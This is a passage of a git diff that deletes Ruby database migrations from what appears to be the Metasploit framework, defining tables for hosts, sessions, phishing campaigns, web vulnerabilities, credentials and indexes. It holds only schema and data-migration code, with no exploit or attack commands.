Mdm::Note.find(:all).each do |note| - next unless note.ntype[/^auth\.(.*)/] - note.delete - end - rescue - say "There was a problem migrating auth credentials. Skipping." - return true # Never fail! - end - end - - - def self.down - raise ActiveRecord::IrreversibleMigration - end - -end - diff --git a/data/sql/migrate/20100824151500_add_exploited_table.rb b/data/sql/migrate/20100824151500_add_exploited_table.rb deleted file mode 100755 index b7897d3832..0000000000 --- a/data/sql/migrate/20100824151500_add_exploited_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddExploitedTable < ActiveRecord::Migration - def self.up - create_table :exploited_hosts do |t| - t.integer :host_id, :null => false - t.integer :service_id - t.string :session_uuid, :limit => 8 - t.string :name, :limit => 2048 - t.string :payload, :limit => 2048 - t.timestamps - end - end - def self.down - drop_table :exploited_hosts - end -end - diff --git a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb b/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb deleted file mode 100755 index c136d4b9d7..0000000000 --- a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddOwnerToWorkspaces < ActiveRecord::Migration - def self.up - add_column :workspaces, :owner_id, :integer - end - - def self.down - remove_column :workspaces, :owner_id - end -end diff --git a/data/sql/migrate/20100911122000_add_report_templates.rb b/data/sql/migrate/20100911122000_add_report_templates.rb deleted file mode 100755 index 08b06d4c5f..0000000000 --- a/data/sql/migrate/20100911122000_add_report_templates.rb +++ /dev/null @@ -1,18 +0,0 @@ -class AddReportTemplates < ActiveRecord::Migration - - def self.up - create_table :report_templates do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :path, :limit => 1024 - t.text :name - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/20100916151530_require_admin_flag.rb b/data/sql/migrate/20100916151530_require_admin_flag.rb deleted file mode 100755 index d73e18425d..0000000000 --- a/data/sql/migrate/20100916151530_require_admin_flag.rb +++ /dev/null @@ -1,15 +0,0 @@ -class RequireAdminFlag < ActiveRecord::Migration - - # Make the admin flag required. - def self.up - # update any existing records - Mdm::User.update_all({:admin => true}, {:admin => nil}) - - change_column :users, :admin, :boolean, :null => false, :default => true - end - - def self.down - change_column :users, :admin, :boolean, :default => true - end - -end diff --git a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb b/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb deleted file mode 100755 index 433bdcf65f..0000000000 --- a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb +++ /dev/null @@ -1,61 +0,0 @@ - -class AddCampaignsAndTemplates < ActiveRecord::Migration - - def self.up - create_table :campaigns do |t| - t.integer :workspace_id, :null => false - t.string :name, :limit => 512 - # Serialized, stores SMTP/other protocol config options etc. - t.text :prefs - t.integer :status, :default => 0 - t.timestamp :started_at - t.timestamps - end - - create_table :email_templates do |t| - t.string :name, :limit => 512 - t.string :subject, :limit => 1024 - t.text :body - t.integer :parent_id - t.integer :campaign_id - end - create_table :attachments do |t| - t.string :name, :limit => 512 - t.binary :data - t.string :content_type, :limit => 512 - t.boolean :inline, :null => false, :default => true - t.boolean :zip, :null => false, :default => false - end - create_table :attachments_email_templates, :id => false do |t| - t.integer :attachment_id - t.integer :email_template_id - end - - create_table :email_addresses do |t| - t.integer :campaign_id, :null => false - t.string :first_name, :limit => 512 - t.string :last_name, :limit => 512 - t.string :address, :limit => 512 - t.boolean :sent, :null => false, :default => false - t.timestamp :clicked_at - end - - create_table :web_templates do |t| - t.string :name, :limit => 512 - t.string :title, :limit => 512 - t.string :body, :limit => 524288 - t.integer :campaign_id - end - end - - def self.down - drop_table :campaigns - drop_table :email_templates - drop_table :attachments - drop_table :attachments_email_templates - drop_table :email_addresses - drop_table :web_templates - end - -end - diff --git a/data/sql/migrate/20100920012100_add_generate_exe_column.rb b/data/sql/migrate/20100920012100_add_generate_exe_column.rb deleted file mode 100755 index 7b055b268f..0000000000 --- a/data/sql/migrate/20100920012100_add_generate_exe_column.rb +++ /dev/null @@ -1,8 +0,0 @@ -class AddGenerateExeColumn < ActiveRecord::Migration - def self.up - add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false - end - def self.down - remove_column :email_templates, :generate_exe - end -end diff --git a/data/sql/migrate/20100926214000_add_template_prefs.rb b/data/sql/migrate/20100926214000_add_template_prefs.rb deleted file mode 100755 index 70b84d0734..0000000000 --- a/data/sql/migrate/20100926214000_add_template_prefs.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddTemplatePrefs < ActiveRecord::Migration - def self.up - remove_column :email_templates, :generate_exe - add_column :email_templates, :prefs, :text - add_column :web_templates, :prefs, :text - end - def self.down - remove_column :email_templates, :prefs - remove_column :web_templates, :prefs - end -end diff --git a/data/sql/migrate/20101001000000_add_web_tables.rb b/data/sql/migrate/20101001000000_add_web_tables.rb deleted file mode 100755 index e55bf286b5..0000000000 --- a/data/sql/migrate/20101001000000_add_web_tables.rb +++ /dev/null @@ -1,57 +0,0 @@ -class AddWebTables < ActiveRecord::Migration - - def self.up - create_table :web_sites do |t| - t.integer :service_id, :null => false - t.timestamps - t.string :vhost, :limit => 2048 - t.text :comments - t.text :options - end - - create_table :web_pages do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.text :query - t.integer :code, :null => false - t.text :cookie - t.text :auth - t.text :ctype - t.timestamp :mtime - t.text :location - t.text :body - t.text :headers - end - - create_table :web_forms do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.string :method, :limit => 1024 - t.text :params - end - - create_table :web_vulns do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.string :method, :limit => 1024 - t.text :params - t.text :pname - t.text :proof - t.integer :risk - t.string :name, :limit => 1024 - end - - end - - def self.down - drop_table :web_sites - drop_table :web_pages - drop_table :web_forms - drop_table :web_vulns - end -end - - diff --git a/data/sql/migrate/20101002000000_add_query.rb b/data/sql/migrate/20101002000000_add_query.rb deleted file mode 100755 index f22d0f2954..0000000000 --- a/data/sql/migrate/20101002000000_add_query.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddQuery < ActiveRecord::Migration - def self.up - add_column :web_forms, :query, :text - add_column :web_vulns, :query, :text - end - def self.down - remove_column :web_forms, :query - remove_column :web_vulns, :query - end -end diff --git a/data/sql/migrate/20101007000000_add_vuln_info.rb b/data/sql/migrate/20101007000000_add_vuln_info.rb deleted file mode 100755 index 34c1eb3fd9..0000000000 --- a/data/sql/migrate/20101007000000_add_vuln_info.rb +++ /dev/null @@ -1,15 +0,0 @@ -class AddVulnInfo < ActiveRecord::Migration - def self.up - add_column :web_vulns, :category, :text - add_column :web_vulns, :confidence, :text - add_column :web_vulns, :description, :text - add_column :web_vulns, :blame, :text - end - def self.down - remove_column :web_forms, :category - remove_column :web_vulns, :confidence - remove_column :web_vulns, :description - remove_column :web_vulns, :blame - end -end - diff --git a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb b/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb deleted file mode 100755 index 6281f91343..0000000000 --- a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb +++ /dev/null @@ -1,10 +0,0 @@ - -class AddClientsToCampaigns < ActiveRecord::Migration - def self.up - add_column :clients, :campaign_id, :integer - end - - def self.down - remove_column :clients, :campaign_id - end -end diff --git a/data/sql/migrate/20101009023300_add_campaign_attachments.rb b/data/sql/migrate/20101009023300_add_campaign_attachments.rb deleted file mode 100755 index 6baf770f29..0000000000 --- a/data/sql/migrate/20101009023300_add_campaign_attachments.rb +++ /dev/null @@ -1,15 +0,0 @@ - - -class AddCampaignAttachments < ActiveRecord::Migration - - def self.up - add_column :attachments, :campaign_id, :integer - end - - def self.down - remove_column :attachments, :campaign_id - end - -end - - diff --git a/data/sql/migrate/20101104135100_add_imported_creds.rb b/data/sql/migrate/20101104135100_add_imported_creds.rb deleted file mode 100755 index 92eb12d474..0000000000 --- a/data/sql/migrate/20101104135100_add_imported_creds.rb +++ /dev/null @@ -1,17 +0,0 @@ -class AddImportedCreds < ActiveRecord::Migration - - def self.up - create_table :imported_creds do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :user, :limit => 512 - t.string :pass, :limit => 512 - t.string :ptype, :limit => 16, :default => "password" - end - end - - def self.down - drop_table :imported_creds - end - -end - diff --git a/data/sql/migrate/20101203000000_fix_web_tables.rb b/data/sql/migrate/20101203000000_fix_web_tables.rb deleted file mode 100755 index 2056369ed7..0000000000 --- a/data/sql/migrate/20101203000000_fix_web_tables.rb +++ /dev/null @@ -1,34 +0,0 @@ -class FixWebTables < ActiveRecord::Migration - - def self.up - change_column :web_pages, :path, :text - change_column :web_pages, :query, :text - change_column :web_pages, :cookie, :text - change_column :web_pages, :auth, :text - change_column :web_pages, :ctype, :text - change_column :web_pages, :location, :text - change_column :web_pages, :path, :text - change_column :web_vulns, :path, :text - change_column :web_vulns, :pname, :text - - add_column :web_pages, :request, :text - add_column :web_vulns, :request, :text - end - - def self.down - change_column :web_pages, :path, :text - change_column :web_pages, :query, :text - change_column :web_pages, :cookie, :text - change_column :web_pages, :auth, :text - change_column :web_pages, :ctype, :text - change_column :web_pages, :location, :text - change_column :web_pages, :path, :text - change_column :web_vulns, :path, :text - change_column :web_vulns, :pname, :text - - remove_column :web_pages, :request - remove_column :web_vulns, :request - end -end - - diff --git a/data/sql/migrate/20101203000001_expand_host_comment.rb b/data/sql/migrate/20101203000001_expand_host_comment.rb deleted file mode 100755 index 1a0bc1bc51..0000000000 --- a/data/sql/migrate/20101203000001_expand_host_comment.rb +++ /dev/null @@ -1,12 +0,0 @@ -class ExpandHostComment < ActiveRecord::Migration - - def self.up - change_column :hosts, :comments, :text - end - - def self.down - change_column :hosts, :comments, :string, :limit => 4096 - end -end - - diff --git a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb deleted file mode 100755 index 7365e14f9d..0000000000 --- a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration - def self.up - add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false - end - - def self.down - remove_column :workspaces, :limit_to_network - end -end diff --git a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb b/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb deleted file mode 100755 index f41bc6a813..0000000000 --- a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddModuleUuidToTasks < ActiveRecord::Migration - def self.up - add_column :tasks, :module_uuid, :string, :limit => 8 - end - - def self.down - remove_column :tasks, :module_uuid - end -end diff --git a/data/sql/migrate/20110204112800_add_host_tags.rb b/data/sql/migrate/20110204112800_add_host_tags.rb deleted file mode 100755 index d07c885c35..0000000000 --- a/data/sql/migrate/20110204112800_add_host_tags.rb +++ /dev/null @@ -1,28 +0,0 @@ -class AddHostTags < ActiveRecord::Migration - - def self.up - - create_table :tags do |t| - t.integer :user_id - t.string :name, :limit => 1024 - t.text :desc - t.boolean :report_summary, :null => false, :default => false - t.boolean :report_detail, :null => false, :default => false - t.boolean :critical, :null => false, :default => false - t.timestamps - end - - create_table :hosts_tags, :id => false do |t| - t.integer :host_id - t.integer :tag_id - end - - end - - def self.down - drop_table :hosts_tags - drop_table :tags - end - -end - diff --git a/data/sql/migrate/20110317144932_add_session_table.rb b/data/sql/migrate/20110317144932_add_session_table.rb deleted file mode 100755 index 15ac8852bb..0000000000 --- a/data/sql/migrate/20110317144932_add_session_table.rb +++ /dev/null @@ -1,110 +0,0 @@ -class AddSessionTable < ActiveRecord::Migration - - class Event < ActiveRecord::Base - serialize :info - end - - class SessionEvent < ActiveRecord::Base - belongs_to :session - end - - class Session < ActiveRecord::Base - has_many :events, :class_name => 'AddSessionTable::SessionEvent' - serialize :datastore - end - - def self.up - - create_table :sessions do |t| - t.integer :host_id - - t.string :stype # session type: meterpreter, shell, etc - t.string :via_exploit # module name - t.string :via_payload # payload name - t.string :desc # session description - t.integer :port - t.string :platform # platform type of the remote system - t.string :routes - - t.text :datastore # module's datastore - - t.timestamp :opened_at, :null => false - t.timestamp :closed_at - - t.string :close_reason - end - - create_table :session_events do |t| - t.integer :session_id - - t.string :etype # event type: command, output, upload, download, filedelete - t.binary :command - t.binary :output - t.string :remote_path - t.string :local_path - - t.timestamp :created_at - end - - # - # Migrate session data from events table - # - - close_events = Event.find_all_by_name("session_close") - open_events = Event.find_all_by_name("session_open") - - command_events = Event.find_all_by_name("session_command") - output_events = Event.find_all_by_name("session_output") - upload_events = Event.find_all_by_name("session_upload") - download_events = Event.find_all_by_name("session_download") - - open_events.each do |o| - c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] } - - s = Session.new( - :host_id => o.host_id, - :stype => o.info[:session_type], - :via_exploit => o.info[:via_exploit], - :via_payload => o.info[:via_payload], - :datastore => o.info[:datastore], - :opened_at => o.created_at - ) - - if c - s.closed_at = c.created_at - s.desc = c.info[:session_info] - else - # couldn't find the corresponding close event - s.closed_at = s.opened_at - s.desc = "?" - end - - uuid = o.info[:session_uuid] - - command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] ) - end - - output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] ) - end - - upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) - end - - download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) - end - - s.events.sort_by(&:created_at) - - s.save! - end - end - - def self.down - drop_table :sessions - drop_table :session_events - end -end diff --git a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb b/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb deleted file mode 100755 index 7c0e57c505..0000000000 --- a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddLocalIdToSessionTable < ActiveRecord::Migration - - def self.up - add_column :sessions, :local_id, :integer - end - - def self.down - remove_column :sessions, :local_id - end - -end diff --git a/data/sql/migrate/20110415175705_add_routes_table.rb b/data/sql/migrate/20110415175705_add_routes_table.rb deleted file mode 100755 index 1eb104f9bf..0000000000 --- a/data/sql/migrate/20110415175705_add_routes_table.rb +++ /dev/null @@ -1,18 +0,0 @@ -class AddRoutesTable < ActiveRecord::Migration - - def self.up - create_table :routes do |t| - t.integer :session_id - t.string :subnet - t.string :netmask - end - - remove_column :sessions, :routes - end - - def self.down - drop_table :routes - - add_column :sessions, :routes, :string - end -end diff --git a/data/sql/migrate/20110422000000_convert_binary.rb b/data/sql/migrate/20110422000000_convert_binary.rb deleted file mode 100755 index 4fa3428ad1..0000000000 --- a/data/sql/migrate/20110422000000_convert_binary.rb +++ /dev/null @@ -1,72 +0,0 @@ -class ConvertBinary < ActiveRecord::Migration - - - class WebPage < ActiveRecord::Base - serialize :headers - end - - class WebVuln < ActiveRecord::Base - serialize :params - end - - def bfilter(str) - str = str.to_s - str.encoding = 'binary' if str.respond_to?('encoding=') - str.gsub(/[\x00\x7f-\xff]/, '') - end - - def self.up - rename_column :web_pages, :body, :body_text - rename_column :web_pages, :request, :request_text - rename_column :web_vulns, :request, :request_text - rename_column :web_vulns, :proof, :proof_text - - add_column :web_pages, :body, :binary - add_column :web_pages, :request, :binary - add_column :web_vulns, :request, :binary - add_column :web_vulns, :proof, :binary - - WebPage.find(:all).each { |r| r.body = r.body_text; r.save! } - WebPage.find(:all).each { |r| r.request = r.request_text; r.save! } - WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! } - WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! } - - remove_column :web_pages, :body_text - remove_column :web_pages, :request_text - remove_column :web_vulns, :request_text - remove_column :web_vulns, :proof_text - - WebPage.connection.schema_cache.clear! - WebPage.reset_column_information - WebVuln.connection.schema_cache.clear! - WebVuln.reset_column_information - end - - def self.down - - rename_column :web_pages, :body, :body_binary - rename_column :web_pages, :request, :request_binary - rename_column :web_vulns, :request, :request_binary - rename_column :web_vulns, :proof, :proof_binary - - add_column :web_pages, :body, :text - add_column :web_pages, :request, :text - add_column :web_vulns, :request, :text - add_column :web_vulns, :proof, :text - - WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! } - WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } - WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! } - WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } - - remove_column :web_pages, :body_binary - remove_column :web_pages, :request_binary - remove_column :web_vulns, :request_binary - remove_column :web_vulns, :proof_binary - - WebPage.connection.schema_cache.clear! - WebPage.reset_column_information - WebVuln.connection.schema_cache.clear! - WebVuln.reset_column_information - end -end diff --git a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb b/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb deleted file mode 100755 index 48380af6ae..0000000000 --- a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb +++ /dev/null @@ -1,8 +0,0 @@ -class AddLastSeenToSessions < ActiveRecord::Migration - def self.up - add_column :sessions, :last_seen, :timestamp - end - def self.down - remove_column :sessions, :last_seen - end -end diff --git a/data/sql/migrate/20110513143900_track_successful_exploits.rb b/data/sql/migrate/20110513143900_track_successful_exploits.rb deleted file mode 100755 index 7c55105fe8..0000000000 --- a/data/sql/migrate/20110513143900_track_successful_exploits.rb +++ /dev/null @@ -1,31 +0,0 @@ -class TrackSuccessfulExploits < ActiveRecord::Migration - - - class ExploitedHost < ActiveRecord::Base - end - - class Vuln < ActiveRecord::Base - end - - def self.up - add_column :vulns, :exploited_at, :timestamp - - # Migrate existing exploited_hosts entries - - ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host| - next unless(exploited_host.name =~ /^(exploit|auxiliary)\//) - vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id) - next if vulns.empty? - vulns.each do |vuln| - vuln.exploited_at = exploited_host.updated_at - vuln.save - end - end - - end - - def self.down - remove_column :vulns, :exploited_at - end - -end diff --git a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb deleted file mode 100755 index e1b8955b7f..0000000000 --- a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb +++ /dev/null @@ -1,26 +0,0 @@ -class RenameAndPruneNessusVulns < ActiveRecord::Migration - - class Vuln < ActiveRecord::Base - end - - # No table changes, just vuln renaming to drop the NSS id - # from those vulns that have it and a descriptive name. - def self.up - Vuln.find(:all).each do |v| - if v.name =~ /^NSS-0?\s*$/ - v.delete - next - end - next unless(v.name =~ /^NSS-[0-9]+\s(.+)/) - new_name = $1 - next if(new_name.nil? || new_name.strip.empty?) - v.name = new_name - v.save! - end - end - - def self.down - say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800." - end - -end diff --git a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb b/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb deleted file mode 100755 index 5af2d46704..0000000000 --- a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddTaskIdToReportsTable < ActiveRecord::Migration - - def self.up - add_column :reports, :task_id, :integer - end - - def self.down - remove_column :reports, :task_id - end - -end diff --git a/data/sql/migrate/20110527000001_add_api_keys_table.rb b/data/sql/migrate/20110527000001_add_api_keys_table.rb deleted file mode 100755 index 13e6ecedd0..0000000000 --- a/data/sql/migrate/20110527000001_add_api_keys_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddApiKeysTable < ActiveRecord::Migration - def self.up - create_table :api_keys do |t| - t.text :token - t.timestamps - end - end - def self.down - drop_table :api_keys - end -end - diff --git a/data/sql/migrate/20110606000001_add_macros_table.rb b/data/sql/migrate/20110606000001_add_macros_table.rb deleted file mode 100755 index bfb8ef6085..0000000000 --- a/data/sql/migrate/20110606000001_add_macros_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddMacrosTable < ActiveRecord::Migration - def self.up - create_table :macros do |t| - t.timestamps - t.text :owner - t.text :name - t.text :description - t.binary :actions - t.binary :prefs - end - end - def self.down - drop_table :macros - end -end - diff --git a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb b/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb deleted file mode 100755 index e057c2ca20..0000000000 --- a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb +++ /dev/null @@ -1,127 +0,0 @@ -class MoveOldImportedCredsToNewFiles < ActiveRecord::Migration - - class ImportedCred < ActiveRecord::Base - end - - class CredFile < ActiveRecord::Base - end - - class Workspace < ActiveRecord::Base - end - - class << self - - def find_or_create_cred_path - cred_files_dir = nil - msf_base = Msf::Config.install_root - pro_base = File.expand_path(File.join(msf_base, "..", "engine", "lib", "pro")) - if File.directory? pro_base - cred_files_dir = File.expand_path(File.join(msf_base, "..", "cred_files")) - FileUtils.mkdir_p(cred_files_dir) unless File.exists?(cred_files_dir) - if File.directory?(cred_files_dir) and File.writable?(cred_files_dir) - end - end - return cred_files_dir - end - - def find_all_imported_creds_by_workspace - valid_ptypes = ["smb_hash", "userpass", "password"] - valid_workspaces = Workspace.all.map {|w| w.id} - creds = {} - ImportedCred.all.each do |cred| - next unless cred.ptype - next unless valid_ptypes.include? cred.ptype - next unless cred.workspace_id - next unless valid_workspaces.include? cred.workspace_id - creds[cred.workspace_id] ||= [] - creds[cred.workspace_id] << cred - end - return creds - end - - def sort_creds_into_file_types(old_creds) - files = {} - old_creds.each do |wid,creds| - filedata = {} - creds.each do |cred| - filedata[cred.ptype] ||= [] - case cred.ptype - when "smb_hash", "userpass" - filedata[cred.ptype] << ("%s %s" % [cred.user,cred.pass]) - when "password" - filedata[cred.ptype] << cred.pass.to_s - end - files[wid] = filedata - end - end - return files - end - - def write_creds_to_files(old_creds,cred_path) - file_data_to_write = sort_creds_into_file_types(old_creds) - files_written = [] - file_data_to_write.each do |wid, fdata_hash| - fdata_hash.each do |ftype,cred_data| - next unless cred_data - next if cred_data.empty? - fname = File.join(cred_path,"creds_#{wid}_#{ftype}-#{Time.now.utc.to_i}.txt") - fdata = cred_data.join("\n") - fh = File.open(fname, "wb") - begin - fh.write fdata - fh.flush - ensure - fh.close - end - files_written << fname - end - end - return files_written - end - - def register_new_files(new_files) - successful_count = 0 - new_files.each do |fname| - next unless File.split(fname).last =~ /^creds_([0-9]+)_(userpass|password|smb_hash)\-[0-9]+\.txt$/ - wid = $1 - next unless Workspace.find(wid) - ftype = $2 - actual_ftype = case ftype - when "smb_hash", "userpass" - "userpass" # They're treated the same - when "password" - "pass" - end - next unless actual_ftype - say "Registering credential file '%s' for workspace %d as type '%s'" % [fname,wid,actual_ftype] - cred_file = CredFile.new - cred_file.workspace_id = wid - cred_file.created_by = "" - cred_file.path = fname - cred_file.name = "#{ftype}.txt" - cred_file.desc = "Migrated #{ftype} credentials" - cred_file.ftype = actual_ftype - if cred_file.save - successful_count += 1 - say "Successfully imported #{ftype} credentials for workspace #{wid}" - end - end - successful_count - end - - end - - def self.up - cred_path = find_or_create_cred_path - if cred_path - old_imported_creds = find_all_imported_creds_by_workspace - new_files = write_creds_to_files(old_imported_creds,cred_path) - successful_count = register_new_files(new_files) - end - end - - # Sorry, can't get the old data back. - def self.down - end - -end diff --git a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb b/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb deleted file mode 100755 index ee9ee21070..0000000000 --- a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddSettingsToTasksTable < ActiveRecord::Migration - - def self.up - add_column :tasks, :settings, :binary - end - - def self.down - remove_column :tasks, :settings - end - -end - diff --git a/data/sql/migrate/20110624000001_add_listeners_table.rb b/data/sql/migrate/20110624000001_add_listeners_table.rb deleted file mode 100755 index c541be2131..0000000000 --- a/data/sql/migrate/20110624000001_add_listeners_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddListenersTable < ActiveRecord::Migration - def self.up - create_table :listeners do |t| - t.timestamps - t.integer :workspace_id, :null => false, :default => 1 - t.integer :task_id - t.boolean :enabled, :default => true - t.text :owner - t.text :payload - t.text :address - t.integer :port - t.binary :options - end - end - def self.down - drop_table :listeners - end -end - diff --git a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb b/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb deleted file mode 100755 index 283d102105..0000000000 --- a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddMacroToListenersTable < ActiveRecord::Migration - - def self.up - add_column :listeners, :macro, :text - end - - def self.down - remove_column :listeners, :macro - end - -end - diff --git a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb b/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb deleted file mode 100755 index 037af40ae1..0000000000 --- a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddNexposeConsolesTable < ActiveRecord::Migration - def self.up - create_table :nexpose_consoles do |t| - t.timestamps - t.boolean :enabled, :default => true - t.text :owner - t.text :address - t.integer :port, :default => 3780 - t.text :username - t.text :password - t.text :status - t.text :version - t.text :cert - t.binary :cached_sites - end - end - def self.down - drop_table :nexpose_consoles - end -end - diff --git a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb deleted file mode 100755 index 9411724344..0000000000 --- a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddNameToNexposeConsolesTable < ActiveRecord::Migration - - def self.up - add_column :nexpose_consoles, :name, :text - end - - def self.down - remove_column :nexpose_consoles, :name - end - -end - diff --git a/data/sql/migrate/20110717000001_add_profiles_table.rb b/data/sql/migrate/20110717000001_add_profiles_table.rb deleted file mode 100755 index c0b8831bf1..0000000000 --- a/data/sql/migrate/20110717000001_add_profiles_table.rb +++ /dev/null @@ -1,15 +0,0 @@ -class AddProfilesTable < ActiveRecord::Migration - def self.up - create_table :profiles do |t| - t.timestamps - t.boolean :active, :default => true - t.text :name - t.text :owner - t.binary :settings - end - end - def self.down - drop_table :profiles - end -end - diff --git a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb b/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb deleted file mode 100755 index b5fce6fd8f..0000000000 --- a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandCredPtypeColumn < ActiveRecord::Migration - def self.up - change_column :creds, :ptype, :string, :limit => 256 - end - def self.down - change_column :creds, :ptype, :string, :limit => 16 - end -end - diff --git a/data/sql/migrate/20110730000001_add_initial_indexes.rb b/data/sql/migrate/20110730000001_add_initial_indexes.rb deleted file mode 100755 index 4085f64843..0000000000 --- a/data/sql/migrate/20110730000001_add_initial_indexes.rb +++ /dev/null @@ -1,85 +0,0 @@ -class AddInitialIndexes < ActiveRecord::Migration - def self.up - - - add_index :hosts, :address - add_index :hosts, :address6 - add_index :hosts, :name - add_index :hosts, :state - add_index :hosts, :os_name - add_index :hosts, :os_flavor - add_index :hosts, :purpose - - # Removed (conditionally dropped in the next migration) - # add_index :hosts, :comments - - add_index :services, :port - add_index :services, :proto - add_index :services, :state - add_index :services, :name - - # Removed (conditionally dropped in the next migration) - # add_index :services, :info - - add_index :notes, :ntype - - add_index :vulns, :name - - # Removed (conditionally dropped in the next migration) - # add_index :vulns, :info - - add_index :refs, :name - - add_index :web_sites, :vhost - add_index :web_sites, :comments - add_index :web_sites, :options - - add_index :web_pages, :path - add_index :web_pages, :query - - add_index :web_forms, :path - - add_index :web_vulns, :path - add_index :web_vulns, :method - add_index :web_vulns, :name - end - - def self.down - - remove_index :hosts, :address - remove_index :hosts, :address6 - remove_index :hosts, :name - remove_index :hosts, :state - remove_index :hosts, :os_name - remove_index :hosts, :os_flavor - remove_index :hosts, :purpose - remove_index :hosts, :comments - - remove_index :services, :port - remove_index :services, :proto - remove_index :services, :state - remove_index :services, :name - remove_index :services, :info - - remove_index :notes, :ntype - - remove_index :vulns, :name - remove_index :vulns, :info - - remove_index :refs, :name - - remove_index :web_sites, :vhost - remove_index :web_sites, :comments - remove_index :web_sites, :options - - remove_index :web_pages, :path - remove_index :web_pages, :query - - remove_index :web_forms, :path - - remove_index :web_vulns, :path - remove_index :web_vulns, :method - remove_index :web_vulns, :name - end -end - diff --git a/data/sql/migrate/20110812000001_prune_indexes.rb b/data/sql/migrate/20110812000001_prune_indexes.rb deleted file mode 100755 index 54b681f273..0000000000 --- a/data/sql/migrate/20110812000001_prune_indexes.rb +++ /dev/null @@ -1,23 +0,0 @@ -class PruneIndexes < ActiveRecord::Migration - def self.up - - if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments") - remove_index :hosts, :comments - end - - if indexes(:services).map{|x| x.columns }.flatten.include?("info") - remove_index :services, :info - end - - if indexes(:vulns).map{|x| x.columns }.flatten.include?("info") - remove_index :vulns, :info - end - end - - def 